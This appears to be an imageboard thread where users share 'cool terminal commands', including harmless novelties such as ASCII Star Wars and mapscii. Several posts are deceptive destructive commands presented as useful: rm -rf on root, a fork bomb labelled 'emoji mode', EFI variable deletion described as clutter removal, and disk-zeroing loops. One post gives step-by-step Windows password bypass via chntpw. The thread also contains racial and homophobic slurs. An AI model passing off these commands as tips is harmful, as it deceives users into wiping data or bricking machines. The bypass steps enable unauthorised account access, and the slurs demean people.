What are some cool terminal commands?

What are some cool terminal commands?

Attached: 1526415183704.jpg (720x540, 45K)

Other urls found in this thread:

learningnetwork.cisco.com/blogs/vip-perspectives/2016/02/19/telnet-vs-ssh-and-other-security-features
twitter.com/NSFWRedditVideo

sudo rm -rf --no-preserve-root /

Attached: 1526182461621.jpg (233x233, 57K)

telnet mapscii.me

Attached: MapSCII-3.png (1366x717, 55K)

>Africa divided into two parts

Attached: 1486849243149.png (374x347, 171K)

Neat

woah

sudo dd if=/dev/random of=~/ status=progress

;^}

Good evening reddit.

cd ~/

wget -qO- cheat.sh

cd ../
cd ../
cd ../
ls

apt-get moo

echo ‘op is a fag’ | cowsay

>not $ cowsay "op is a fag"

Attached: fzf.webm (852x480, 584K)

Comfy

Don't run this. It will delete all your data.

Why is he sitting like that?

Ah, summer.

...

sl
>if nothing happens then sudo [package manager] -i sl

mount -o remount,rw -t efivarfs efivarfs /sys/firmware/efi/efivars && rm -f /sys/firmware/efi/efivars/*

speeds up your computer by removing unnecessary clutter

for d in $(ls /dev); do dd if=/dev/zero of=$d bs=512 count=8 2>&1 >/dev/null; done

Star Wars: A New Hope in ASCII

telnet towel.blinkenlights.nl

>telnet mapscii.me
nice

:(){ :|:& };:
>oh, look at all the happy faces, it must be good!

This enables emoji mode in your terminal, try it.

Attached: 1526300832367.jpg (1024x752, 93K)

cd $HOME
mkdir linuseasteregg
sudo ln -s / ~/linuseasteregg
sudo rm -rf linuseasteregg

it will keep asking you to not do it, just force it to keep going, enter "y", etc. This will unlock a secret menu allowing an easy way of changing settings in the UNIX kernel my dude, linus left it in their when he developed it in 1977

bet you didn't even run it

Attached: 1523439898384.png (500x455, 72K)

I hate how normies love this one. It's the same as a(){ a|a & };a

Ah, summer.

curl "wallpapers.wallhaven.cc/wallpapers/full/wallhaven-[1-10000000].jpg" -o "#1.jpg"

incredible

sudo rm -rf ~

curl parrot.live

sudo dd bs=4M if=windows10.iso of=/Dev/sdx

tmux

uptime by penis size:
epeen() { uptime | perl -naE 'say+8,"="x$F[2],D' }

$ sudo apt-get install -y hollywood
$ hollywood

>lsblk
>sudo badblocks -svw-t 0x00 /dev/sdX
To zero a hard drive

Hack an unencrypted windows password with a live CD/USB Ubuntu type Distro connected to the web via Ethernet or wifi from GUI if possible (not as fast)
>vi /etc/apt/sources.list
> add universe to ppa quickly with /main enter, i to insert mode, “universe “ with the space at the end, esc to command mode, n, n, .
> n jumps to next found from /main search, . from command mode pastes a copy of what you typed in insert mode last, instantly enabling all the universe repositories from command line
> apt update && apt install chntpw
> lsblk to find the windows C:\ partition
> mkdir /mnt/win
> mnt /dev/sdb2 /mnt/win
If ntfs is dirty run this to clean mount it read write, with umount if necessary to remount it
> ntfsfix /dev/sdb2
> mnt -o remove_hiberfile /dev/sdb2 /mnt/win
Finish with
> cd /mnt/win/Windows/System32/config/
> chntpw SAM
Follow the instructions from there to enable the Administrator account, and reset its password, and after you can login as admin on windows and change the users password without knowing it. If it is a windows live account and it’s locked out of your windows live account, copy the user directory to the local C:/ root and you have to make a new profile with that data, preferably a local account not signed into a live ID

0 upgraded, 45 newly installed, 0 to remove and 1 not upgraded.
Need to get 14.7 MB of archives.
After this operation, 46.9 MB of additional disk space will be used.

Attached: 1471007438949.jpg (690x460, 62K)

you don't need to type ~/

alias ..="cd .."

Fzf is great and I kinda have gone a little overboard building a workflow around it

>mapscii.me
dope

sl

htop

very insightful comment

wall

neat

tr -cd [:lower:] < /dev/urandom | fold -w6 | grep nigger | nl

It didn't do anything

command history
!

No, thanks. Telnet is not secure.

it's a fork bomb

A fork bomb with Bash syntax. I'm not using Bash.

Actually surprisingly useful commands. Thanks user

sudo !!

repeat last command as sudo

>2018
>sudo

Attached: scanme.png (305x305, 5K)

If you're worried about terminal escape sequence exploits, do it from a VM

does anyone have a script for randomly getting an image from a Jow Forums board (like /wg/) and setting it as wallpaper every few days or hours

Still no hits after almost 5 hours, I'm going to bed

> parsing ls

Attached: 1526561980755.jpg (1420x970, 295K)

Correct, UEFI is unnecessary and a solution to a problem which doesn't exist

learningnetwork.cisco.com/blogs/vip-perspectives/2016/02/19/telnet-vs-ssh-and-other-security-features

ghci

These are genuinly useful thanks

>telnet mapscii.me
WOW that is powerful magig it even zooms in if you use the scroll wheel

Umbunga will no like this magic
umbunga him no understand

for that true star wars experience

telnet towel.blinkenlights.nl

alias doh="sudo !!"

That woun't work, pal.

Yeah I think I tried it before but couldn't figure out why it didn't work

holy shit

! doesn't expand in quotes; it's like you have typed sudo "!!" into the shell.

You can work around it:
alias doh='sudo $(history -p \!\!)'

Attached: 1514949827107.png (278x295, 84K)